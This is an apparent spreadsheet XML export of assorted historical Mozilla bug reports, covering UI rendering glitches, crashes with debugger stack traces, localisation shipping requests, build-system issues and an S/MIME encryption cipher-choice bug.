    <t>SEAMONKEY-514854</t>
  </si>
  <si>
    <t>Default theme issues with some menulists</t>
  </si>
  <si>
    <t>At the moment there are a few issues with some menulists when you are using the default theme:
On Linux:
1/ In the Browser Preferences pane the Display on menulist has its label truncated.
On all platforms (well at least linux and windows):
1/ The Browser &gt; Internet Search Preferences pane can have truncated labels when selected(e.g. dmoz.org).
2/ On the same pane (comparing to modern theme) the menuitems are missing icons.
3/ In Composer on Insert Image &gt; Appearance &gt; Align Text to image some have truncated labels when selected (e.g. Wrap to the left).
4/ In the same place (comparing to modern theme) the menuitems are missing icons.</t>
  </si>
  <si>
    <t>NSS-193961</t>
  </si>
  <si>
    <t>QuickDER should not assert if extra data is present</t>
  </si>
  <si>
    <t>When a buffer is passed in that contains correct DER data plus additional
padding bytes the decoding should not succeed. Only DER data should be passed in.
Currently the decoder asserts under this condition in debug builds.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-287634</t>
  </si>
  <si>
    <t>[es-MX] Spanish (Mexico): Firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.7) Gecko/20040616
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 es-ES rv:1.7) Gecko/20040616
Product: Mozilla Firefox
Language + country: es-MX
Contact:
Alejandro Serrano GonzÃƒÂ¡lez
alejandrosg@gmail.com
http://mozmex.ismx.net
Reproducible: Always</t>
  </si>
  <si>
    <t>alejandrosg</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-413914</t>
  </si>
  <si>
    <t>af / Afrikaans</t>
  </si>
  <si>
    <t>Please ship Thunderbird 2 in Afrikaans</t>
  </si>
  <si>
    <t>This is a bug for tracking shipping the Afrikaans locale of Thunderbird 2. The various bugs leading up to this are indicated as dependencies. This is completed ready to ship tested etc.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-499953</t>
  </si>
  <si>
    <t>access keys are used more than once in exceptions window</t>
  </si>
  <si>
    <t>there are three windows that list exception sites (ff3.5): the pop-up windows allowed sites the images exceptions both on the content page of the options window and the addons allowed sites in the security page.
on all these windows the letter ×› is used as access key twice: in ×›×ª×•×‘×ª ××ª×¨ (the new site text box title) and in the ×”×¡×¨ ××ª ×›×œ ×”××ª×¨×™× (remove all sites) button.
the letter ×ª could be used for the ×›×ª×•×‘×ª ××ª×¨ one.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-210906</t>
  </si>
  <si>
    <t>www.ftc.gov (FTC) -  donotcall css served with wrong mime type</t>
  </si>
  <si>
    <t>Federal Do Not Call Registry. IE6 serves up a pretty page. Mozilla gets no
styling from http://www.ftc.gov/bcp/conline/edcams/donotcall/sitestyles.css.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-467746</t>
  </si>
  <si>
    <t>Update DOMi support to new m-c trunk versions: Gecko 1.9.2a1pre + Firefox 3.2a1pre</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #433935 +++</t>
  </si>
  <si>
    <t>FIREFOX-400606</t>
  </si>
  <si>
    <t>run-mozilla.sh: line 131:  3201 Segmentation fault $prog ${1+$@}</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a9pre) Gecko/2007101822 Minefield/3.0a9pre
Build Identifier: Mozilla/5.0 (X11 U Linux x86_64 en-US rv:1.9a9pre) Gecko/2007101822 Minefield/3.0a9pre
x86_64 LFS system glibc-2.6 gcc-4.2.2 no optimizations.
Reproducible: Always
Steps to Reproduce:
1.http://xmlhack.ru/archives/2007/10/000222.html
2. click and drag white field with math formula
Actual Results:  
crash
Expected Results:  
normal work</t>
  </si>
  <si>
    <t>FIREFOX-374284</t>
  </si>
  <si>
    <t>all items disabled and no properties menu when you context click on a bookmark item in the bookmarks sidebar when you query</t>
  </si>
  <si>
    <t>TOOLKIT-333211</t>
  </si>
  <si>
    <t>No indication that a restart is needed when a compatibility update is applied to an app disabled addon</t>
  </si>
  <si>
    <t>I just checked for new updates and since I chance the update.rdf file for my extension (the maxversion string) I got the following dialog:
---------
Reliby
A compatibility update has been applied to Reliby
---------
shouldn't we say that the update will be applied at next startup?</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-254947</t>
  </si>
  <si>
    <t>MailNews should rebuild corrupted/outdated Inbox summary .msf file before fetching new mail</t>
  </si>
  <si>
    <t>Linux build 2004080905
This bug is consequence of bug 253804. If Inbox summary file is corrupted or
outdated then starting MailNews with turned on Check for new messages at
startup and Automatically download new messages options causes the following:
1. New mails are fetched.
2. A new mail indication appears but MailNews does not show exact number of new
mails in the Inbox folder.
3. Junk mails are marked as 'Junk' but not filtered to the Junk folder. I assume
all other filters do not work either.</t>
  </si>
  <si>
    <t>MARKETING-290758</t>
  </si>
  <si>
    <t>Firefox Distribution</t>
  </si>
  <si>
    <t>I would like to distribute the latest official Firefox binaries on CD.  I do 
not have a Web site up yet but I plan to make one and then ship the CDs via 
common carrier in the continental US.  Is it OK to use the Firefox name and 
logo for this purpose?  
Thank you
Gabriel Weinberg yegg@alum.mit.edu</t>
  </si>
  <si>
    <t>yegg</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-372757</t>
  </si>
  <si>
    <t>Bootstrap config file format changes</t>
  </si>
  <si>
    <t>In bootstrap.cfg we need to be able to specify platform-specific build variables for various config options.
The problem lies in that we use the same bootstrap.cfg for an entire release but the following variables are platform and/or machine specific:
buildDir
l10n_buildDir
logDir
updateDir
verifyDir
tagDir
buildPlatform
Maybe these all turn into:
mac_buildDir
win32_buildDir
linuxi686_buildDir
etc.?</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-243342</t>
  </si>
  <si>
    <t>Mozilla browser doesn't change good the links on the page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040510
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a) Gecko/20040510
In the page at http://www.durex.com I find some problems. Firstly appear this
message on the page: (We have detected your browser may not be capable of
viewing Durex.com correctly. Please check you are running a recent browser with
cookies and javaScript enabled. If you are sure your browser is configured
correctly please continue).
But the main problem is when you can't change the country. Always appear in the
same page the U.K.
Reproducible: Always
Steps to Reproduce:
1.Enter in http://www.durex.com and push continue
2.In the end of the page appear a list with lots of countries select one for
example Spain Germany etc.(Except UK because is the main web)
3.You can see how always appear de same page. The country doesn't change always
appear the UK page
Expected Results:  
I will enter in www.durex.com Spanish page</t>
  </si>
  <si>
    <t>tasadarf</t>
  </si>
  <si>
    <t>CALENDAR-868815</t>
  </si>
  <si>
    <t>Add a helper function to simplify module loading</t>
  </si>
  <si>
    <t>We have a lot of NSGetFactory functions that load additional scripts. This can be simplified with a helper.</t>
  </si>
  <si>
    <t>CORE-225419</t>
  </si>
  <si>
    <t>Unstable rendering when using :hover pseudoclass and position: fixed</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5) Gecko/20031007 Firebird/0.7
Applying the techniques described in Eric Meyer's Pure CSS Menus css/edge
page I wrote a small test page that includes a number of menus containing
submenus in varying directions. When mousing over the toplevel menus (direct
children of the containing  elements) the menu is displayed but the
surrounding area is temporarily garbled. 
For second and deeper level nested menus there is no apparent rending problem.
I'm not sure of the validity or acceptability of my CSS code but it works for
Eric and I'd much prefer it if it worked for me too...
It seems to display correctly in Safari on OS X. (I lose the opacity but that's
another problem - for some reason on my Debian copy of Firebird 0.6.1 the
opacity property causes that item to disappear. I don't think the opacity
property is causing this effect.) 
Reproducible: Always
Steps to Reproduce:
1. Move mouse over FOO in bottom left corner. Observe rendering problem
particularly at bottom of page.
2. Move mouse up menu to MORE. Once again observe rendering problem
3. Move mouse across and up to GAR. Observe lack of rendering problem.
Actual Results:  
Text jumps around the page - especially down the bottom. 
Expected Results:  
Displayed the menus without mistakenly rendering the rest of the page. Does the
engine actually need to rerender the other bits?</t>
  </si>
  <si>
    <t>edlang</t>
  </si>
  <si>
    <t>BUGZILLA-353528</t>
  </si>
  <si>
    <t xml:space="preserve"> fields with just one value shouldn't appear editable</t>
  </si>
  <si>
    <t>steps:
1. find a product that has only 1 version and only 1 tm Websites works on bmo
2. find any bug in that product e.g. bug 13146
compare: bgo 356938 
expected results: consider not using any tags and instead just inline the value (in a span).
whether there should be a style (inset border or similar) is subject to negotiation.
note: this should be done globally for whatever generator we have so that you avoid the error that the gnome team created which can be seen in bgo 356938  where target milestone has no select but version does.
at this time there's only one version (unspecified) and one target milestone (---).</t>
  </si>
  <si>
    <t>SOCORRO-528617</t>
  </si>
  <si>
    <t>Unclosed or incorrectly closed  tag with title attribute casuses bogus 1 tooltips all over topcrash reports</t>
  </si>
  <si>
    <t>STR:
1. http://crash-stats.mozilla.com/topcrasher/byversion/Camino/2.0
2. Hover over anything below The report covers 100.00% of all 304 crashes during this period. that doesn't show its own tooltip (e.g. anything except signature links and bug links)
ER: No 1 tooltip
AR: 1 tooltip all over the place
I'm not sure what the 1 is supposed to do/mean even in the place where it originally appears so I'm really confused why it's even there.
HTML snippet:
    Top 165 Crashing Signatures
    10/30 11:00 through
    11-13 10:00.
    The  report covers 100.00% of all 304 crashes during this period.
Note a  is opened right before 100% and is not closed before  is opened for 304 (and closed right after 304).
This started happening after last night's crash-stats scheduled downtime/update.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-435377</t>
  </si>
  <si>
    <t>Live Chat server needs to be restarted before SFD</t>
  </si>
  <si>
    <t>Sorry for not figuring this out sooner I made some changes for Support Firefox Day and turns out the process needs to be restarted for them to work.</t>
  </si>
  <si>
    <t>FIREFOX-292024</t>
  </si>
  <si>
    <t>Firefox renders DHTML menu (DIV layer nested in TD cells) incorrectly on INITIAL load only.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.7) Gecko/20050414 Firefox/1.0.3
Firefox renders DHTML menu (DIV layer nested in TD cells) incorrectly on INITIAL
load.  Upon Firefox window resize or reload Firefox displays the DHTML menu
subsequently as it appears in Mozilla and Internet Explorer.
Reproducible: Always
Steps to Reproduce:
1. Load page.
2. Resize the Firefox window or reload the page.
3. Page renders as seen in Mozilla and Internet Explorer every time.
Actual Results:  
Page renders as seen in Mozilla and Internet Explorer every time.
Expected Results:  
Display the DHTML in the same location with consistency.</t>
  </si>
  <si>
    <t>cheese97</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-500752</t>
  </si>
  <si>
    <t>ftp.mozilla.org serving .cab as text/plain</t>
  </si>
  <si>
    <t>$ curl -I http://ftp.mozilla.org/pub/mozilla.org/mobile/nightly/fennec-1.0a2.en-US.wince-arm.cab
Content-Type: text/plain charset=UTF-8
This makes it tricky to install fennec on a windows mobile device because the browser just starts showing binary text.
So for now I just mirror the file on my server which responds with..
Content-Type: application/vnd.ms-cab-compressed</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-323211</t>
  </si>
  <si>
    <t>convert mailnews/import to nsIFile</t>
  </si>
  <si>
    <t>To save bug 33451 getting full up with patches I've created this one to start looking at removing nsFileSpec &amp; co from mailnews/import. Depending on how it goes I'm mainly going to look at removing it from the address book code first and following it with the email code later.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-98015</t>
  </si>
  <si>
    <t>Submenus do not pop-down from the menu on this site</t>
  </si>
  <si>
    <t>[Tested with 2001-08-31-08 on Linux]
Go to the URL mentioned above and try to click on one of the menu items such as
Support or Downloads. Notice that nothing happens as you click them. Trying
the same in Netscape 4.x pops down a submenu. When you hold the mouse over a
menu item in Mozilla you see this URL being displayed in the statusbar:
http://www.yamaha.co.jp/english/product/computer/navi.html#.
If this is an error on the site please reassign this against evangelism.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-496491</t>
  </si>
  <si>
    <t>[Bootstrap] Move update verify bumping to Updates step</t>
  </si>
  <si>
    <t>This is the Bootstrap (Tb2 &amp; Fx3) equivalent of bug 486454. Basically doing the config bump for update verify on each platform doesn't work so well when the config lives in a hg repository.</t>
  </si>
  <si>
    <t>CORE-425811</t>
  </si>
  <si>
    <t>ActionMonkey: browser doesn't start (selflock in GC -&gt; postcollect -&gt; CycleCollector -&gt; DestroyContext -&gt; GC)</t>
  </si>
  <si>
    <t>The deadlock is actually around gc-&gt;m_callbackListLock not gc-&gt;m_lock.
^C
Program received signal SIGINT Interrupt.
0xffff027f in __spin_lock ()
(gdb) info threads
* 1 process 54663 local thread 0x2e3f  0xffff027f in __spin_lock ()
(gdb) where
#0  0xffff027f in __spin_lock ()
#1  0x003c25e3 in MMgc::GCSpinLock::Acquire (this=0x850754) at GCSpinLockMac.h:89
#2  0x003c2615 in MMgc::GCAcquireSpinlock::GCAcquireSpinlock (this=0xbfffa934 spinlock=@0x850754) at GCSpinLockMac.h:131
#3  0x003c8478 in MMgc::GC::CollectWithBookkeeping (this=0x850400 callerHoldsLock=false callerHasActiveRequest=true) at /Users/jason/dev/am/actionmonkey-merge/js/tamarin/MMgc/GC.cpp:431
#4  0x0015e6b1 in js_GC (cx=0x7ce760 gckind=GC_NORMAL) at /Users/jason/dev/am/actionmonkey-merge/js/src/jsgc.cpp:1634
#5  0x0013d821 in js_DestroyContext (cx=0x7ce760 mode=JSDCM_FORCE_GC) at /Users/jason/dev/am/actionmonkey-merge/js/src/jscntxt.cpp:420
#6  0x0012422f in JS_DestroyContext (cx=0x0) at /Users/jason/dev/am/actionmonkey-merge/js/src/jsapi.cpp:1018
#7  0x0a10429e in nsXPConnect::ReleaseJSContext (this=0x7288f0 aJSContext=0x7ce760 noGC=0) at /Users/jason/dev/am/actionmonkey-merge/js/src/xpconnect/src/nsXPConnect.cpp:2085
#8  0x0c97e7d8 in nsJSContext::Unlink (this=0x7ce6b0) at /Users/jason/dev/am/actionmonkey-merge/dom/src/base/nsJSEnvironment.cpp:1221
#9  0x0c97e888 in nsJSContext::cycleCollection::Unlink (this=0x0 p=0x7ce6b0) at /Users/jason/dev/am/actionmonkey-merge/dom/src/base/nsJSEnvironment.cpp:1232
#10 0x002c0825 in nsCycleCollector::CollectWhite (this=0x680000) at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:1660
#11 0x002c0958 in nsCycleCollector::FinishCollection (this=0x680000) at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:2434
#12 0x002c09b1 in nsCycleCollector_finishCollection () at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:2916
#13 0x0a1034f2 in XPCCycleCollectGCCallback (cx=0x754b90 status=JSGC_END) at /Users/jason/dev/am/actionmonkey-merge/js/src/xpconnect/src/nsXPConnect.cpp:450
#14 0x0015eb75 in JSGC::postcollect (this=0x14e002a4) at /Users/jason/dev/am/actionmonkey-merge/js/src/jsgc.cpp:1051
#15 0x003c894b in MMgc::GC::CollectWithBookkeeping (this=0x850400 callerHoldsLock=false callerHasActiveRequest=true) at /Users/jason/dev/am/actionmonkey-merge/js/tamarin/MMgc/GC.cpp:573
#16 0x0015e6b1 in js_GC (cx=0x754b90 gckind=GC_NORMAL) at /Users/jason/dev/am/actionmonkey-merge/js/src/jsgc.cpp:1634
#17 0x001254e4 in JS_GC (cx=0x754b90) at /Users/jason/dev/am/actionmonkey-merge/js/src/jsapi.cpp:2428
#18 0x0a103e80 in nsXPConnect::Collect (this=0x7288f0) at /Users/jason/dev/am/actionmonkey-merge/js/src/xpconnect/src/nsXPConnect.cpp:526
#19 0x002c12a6 in nsCycleCollector::Collect (this=0x680000 aTryCollections=5) at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:2250
#20 0x002c1621 in nsCycleCollector::Shutdown (this=0x754b90) at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:2471
#21 0x002c1654 in nsCycleCollector_shutdown () at /Users/jason/dev/am/actionmonkey-merge/xpcom/base/nsCycleCollector.cpp:2932
#22 0x00242561 in NS_ShutdownXPCOM_P (servMgr=0x7158d4) at /Users/jason/dev/am/actionmonkey-merge/xpcom/build/nsXPComInit.cpp:783
#23 0x00093962 in ScopedXPCOMStartup::~ScopedXPCOMStartup (this=0xbfffee6c) at /Users/jason/dev/am/actionmonkey-merge/toolkit/xre/nsAppRunner.cpp:909
#24 0x00095cb2 in ShowProfileManager (aProfileSvc=0x7135b0 aNative=0x713970) at /Users/jason/dev/am/actionmonkey-merge/toolkit/xre/nsAppRunner.cpp:1771
#25 0x00097bc3 in SelectProfile (aResult=0xbffff460 aNative=0x713970 aStartOffline= aProfileName=0xbffff244) at /Users/jason/dev/am/actionmonkey-merge/toolkit/xre/nsAppRunner.cpp:2071
#26 0x0009e1e9 in XRE_main (argc=1 argv=0xbffff588 aAppData=0x70d9c0) at /Users/jason/dev/am/actionmonkey-merge/toolkit/xre/nsAppRunner.cpp:2878
#27 0x00002870 in main (argc=1 argv=0x70b4f0) at /Users/jason/dev/am/actionmonkey-merge/browser/app/nsBrowserApp.cpp:158</t>
  </si>
  <si>
    <t>FIREFOX-327482</t>
  </si>
  <si>
    <t>Buttons added to the bookmark toolbar are not migrated to Places</t>
  </si>
  <si>
    <t>If you have buttons added to the bookmark toolbar before using places the migration to Places does not keep these buttons around.
Steps to reproduce:
(1) Start a non-Places build.
(2) Add the 'New Tab' button to the bookmarks toolbar
(3) Start a Places-enabled build.
Actual results:
The button you added disappears from the toolbar.
Expected results:
The toolbar would be preserved in tact.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-310920</t>
  </si>
  <si>
    <t>[client] post-mozilla-rel.pl - Don't force copying of Linux XPIs in packit</t>
  </si>
  <si>
    <t>http://lxr.mozilla.org/mozilla/source/tools/tinderbox/post-mozilla-rel.pl#303
forces copying of Linux XPIs though this is done in if ($push_raw_xpis) a few
lines below anyways.
We shouldn't do that so that one can turn off copying of the XPIs where not needed.
Note that lines 262-267 set $push_raw_xpis when the stub installer is built so
it's copied for that anyways.
Note also that all other platforms don't have that line. Additionally there's
no good pointer why that line was added anyways.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-527375</t>
  </si>
  <si>
    <t>QA Tracking bug for China Pack Release based on Firefox 3.5.5</t>
  </si>
  <si>
    <t>This is the QA Tracking bug for the China Pack Build based on Firefox 3.5.5</t>
  </si>
  <si>
    <t>jmi</t>
  </si>
  <si>
    <t>CORE-520848</t>
  </si>
  <si>
    <t>distinguish pseudo-elements right when we parse them rather than separating them later</t>
  </si>
  <si>
    <t>Created attachment 404894
patch
While reviewing bug 508466 I wrote this patch to simplify selector parsing a bit by distinguishing pseudo-elements at the time we parse them rather than later.  (The simplification may be more substantial once that lands too... although I don't really remember.)</t>
  </si>
  <si>
    <t>CORE-332175</t>
  </si>
  <si>
    <t>Drop XMLDocument.load() support</t>
  </si>
  <si>
    <t>I'd like to propose that we drop support for document.load(). DOM3 LS has not received much traction on the Web and document.load() doesn't seem to be in the final version of that spec anyway. XMLHttpRequest has become the de-facto way of doing external file loads.
I think dropping document.load() would reduce our attack surface area a little and would reduce our overall complexity which is a good thing.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-257682</t>
  </si>
  <si>
    <t>multiple simultaneous mapi send mail with same attachment name causes problems</t>
  </si>
  <si>
    <t>If a mapi client does simultaneous mapi sends of messages with the same
attachment name our temp file code won't handle the fact that we already have a
temp file with the same name. Because the mapi send call returns before we've
actually sent the message the temp file could still exist from the first call
when we process the second call. My fix is to make sure the temp file is unique.</t>
  </si>
  <si>
    <t>CORE-347705</t>
  </si>
  <si>
    <t>[FIX]Would it be faster to not call LookupKeyword in TranslateDimension?</t>
  </si>
  <si>
    <t>Calls to LookupKeyword via TranslateDimension are about 1% of total time on the testcase at .  For comparison all of reflow is about 4-5%.
I wonder whether we could avoid calling LookupKeyword here altogether...</t>
  </si>
  <si>
    <t>CORE-303501</t>
  </si>
  <si>
    <t>make SVG NS_NOTYETIMPLEMENTED messages more meaningful</t>
  </si>
  <si>
    <t>When tracking assertions simple asserts with Write me! don't really help in
easily determining the location of the problem. While asserts do show the
file/line number these can change over time making automatic historical
comparisons difficult.</t>
  </si>
  <si>
    <t>CORE-530352</t>
  </si>
  <si>
    <t>Eliminate last nsFileSpec and nsIFileSpec (references) from Core</t>
  </si>
  <si>
    <t>This bug is for the comments (and maybe related code) only:
{
/parser/htmlparser/tests/outsinks/Convert.cpp
    * line 62 -- // until I find out how to use nsFileSpec:
    * line 285 -- // until I find out how to use nsFileSpec:
/widget/src/xpwidgets/nsTransferable.cpp
    * line 89 -- //nsIFileSpec * cacheFile = GetFileSpec(mCacheFileName)
/extensions/java/xpcom/interfaces/Makefile.in
    * line 107 -- # interface nsIFileSpec.
}</t>
  </si>
  <si>
    <t>CORE-463295</t>
  </si>
  <si>
    <t>crash if geolocation timeout &lt; 300ms</t>
  </si>
  <si>
    <t>basically we are passing a nsnull to update() which is dereferenced.</t>
  </si>
  <si>
    <t>NSS-379625</t>
  </si>
  <si>
    <t>Accept SMIME preferences even when they contain NULL parameters</t>
  </si>
  <si>
    <t>Created attachment 263624
signed KMail test email #1
This can be reproduced with the mail/news client in Thunderbird and in
Seamonkey trunk and recent releases.
I received a signed email from a KMail user.  His message had an attribute
of type PKCS #9 S/MIME Capabilities from which we create an S/MIME profile.
It said that his client prefers 3DES and AES.  RC2-40 was not even listed
among the ciphers his client supports.
Then I sent him an encrypted reply.  My reply was encrypted with RC2-40.
That's wrong.
Something failed but it's difficult to say exactly what.
Did we fail to generate an S/MIME profile from the received signed message?
Did we not find the S/MIME profile when we went to encrypt the reply?
Was the failure in PSM? or in NSS? or ?  
I will attach two such signed emails I received with which the problem
can be reproduced. 
The signed message contained these signed attributes:
Using pp I looked at the signature.  Here's part of what I found:
             Authenticated Attributes:
                    Attribute (1):
                        Type: PKCS #9 Content Type
                        Value (1): PKCS #7 Data
                    Attribute (2):
                        Type: PKCS #9 Signing Time
                        Value (1): Mon Apr 30 16:39:49 2007
                    Attribute (3):
                        Type: PKCS #9 Message Digest
                        Value (1):
                            64:23:d9:3e:71:7b:5b:11:66:6b:4c:0d:bf:da:a9:03:
                            16:8d:58:9c
                    Attribute (4):
                        Type: PKCS #9 S/MIME Capabilities
                        Value (1) (encoded): Sequence {
                            Sequence {
                                AES-128-CBC
                                NULL
                            }
                            Sequence {
                                DES-EDE3-CBC
                                NULL
                            }
                        }
And my reply looked like this:
      SEQUENCE {
        OBJECT IDENTIFIER data (1 2 840 113549 1 7 1) (PKCS #7)
        SEQUENCE {
          OBJECT IDENTIFIER rc2CBC (1 2 840 113549 3 2)
          SEQUENCE {
            INTEGER 160
            OCTET STRING 3B EE E9 74 FF FE 87 90
            }
          } ...</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-350394</t>
  </si>
  <si>
    <t>Note regarding use of slashes</t>
  </si>
  <si>
    <t>In step 4 of the Move an existing profile or restore a backed up profile section (currenly the last section) add something like the following:
If you are using a non-relative pathname the direction of the slashes may be relevant (this was true for Windows XP).
The information there was very helpful.  Thanks.</t>
  </si>
  <si>
    <t>cwyman</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-356425</t>
  </si>
  <si>
    <t>link of libxul failed when mozstorage is enabled</t>
  </si>
  <si>
    <t>I'm working on a xulrunner application based on the trunk. Mozstorage is enabled but places is not. The compiling failed during the link of the libxul :
nsStaticXULComponents.o:(.data.rel.ro+0x13c): undefined reference to Â« mozStorageModule_NSGetModule(nsIComponentManager* nsIFile* nsIModule**)   Â»
Perhaps i'm wrong but i think the bug is in toolkit/library/libxul-config.mk : 
ifdef MOZ_PLACES
STATIC_LIBS += morkreader_s
COMPONENT_LIBS += \
	storagecomps \
	places \
	$(NULL)
else
ifdef MOZ_MORK
ifdef MOZ_XUL
COMPONENT_LIBS += \
	mork \
	tkhstory \
	$(NULL)
endif
endif
endif
If places is disabled storage component is not included even if MOZ_STORAGE=1.
(note: if MOZ_STORAGE= the compiler failed on the compiling of toolkit/components/satchel/src/nsFormFillController.cpp : mozIStorageService.h is unknown.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-959218</t>
  </si>
  <si>
    <t>ANR: Deadlock during backgrounding when shutting down disk cache</t>
  </si>
  <si>
    <t>I saw an ANR on my Galaxy Nexus that looks like a double locking in disk cache shutdown code. Gecko stack during deadlock:
&gt; #0  0x40188104 in __futex_syscall3 ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/system/lib/libc.so
&gt; #1  0x4017d5d8 in ?? () from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/system/lib/libc.so
&gt; #2  0x61853dc4 in PR_Lock ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libnss3.so
&gt; #3  0x64be6cf2 in nsDeleteDir::Shutdown(bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #4  0x64be5e56 in nsCacheService::Shutdown() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #5  0x6508a4fc in nsAppShell::ProcessNextNativeEvent(bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #6  0x65093afc in nsBaseAppShell::DoProcessNextNativeEvent(bool unsigned int) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #7  0x65093b8e in nsBaseAppShell::OnProcessNextEvent(nsIThreadInternal* bool unsigned int) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #8  0x64b835e2 in nsThread::ProcessNextEvent(bool bool*) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #9  0x64b5b4aa in NS_ProcessNextEvent(nsIThread* bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #10 0x64b8693e in nsThread::Shutdown() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #11 0x64be6dd2 in nsDeleteDir::Shutdown(bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #12 0x64be5e56 in nsCacheService::Shutdown() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #13 0x6508a4fc in nsAppShell::ProcessNextNativeEvent(bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #14 0x65093afc in nsBaseAppShell::DoProcessNextNativeEvent(bool unsigned int) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #15 0x65093bb0 in nsBaseAppShell::OnProcessNextEvent(nsIThreadInternal* bool unsigned int) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #16 0x64b835e2 in nsThread::ProcessNextEvent(bool bool*) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #17 0x64b5b4aa in NS_ProcessNextEvent(nsIThread* bool) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #18 0x64c90508 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #19 0x64c8805a in MessageLoop::RunInternal() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #20 0x64c8810c in MessageLoop::Run() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #21 0x65090576 in nsBaseAppShell::Run() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #22 0x656288f6 in nsAppStartup::Run() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #23 0x656008ec in XREMain::XRE_mainRun() ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #24 0x656019a8 in XREMain::XRE_main(int char** nsXREAppData const*) ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
&gt; #25 0x65601b24 in XRE_main ()
&gt;    from /Users/nchen/jimdb-arm/lib/0149E0820D01300B/app/org.mozilla.fennec/assets/libxul.so
I think the cause is that for some reason the APP_BACKGROUNDING event [1] was sent twice consecutively causing us to shut down the disk cache twice.
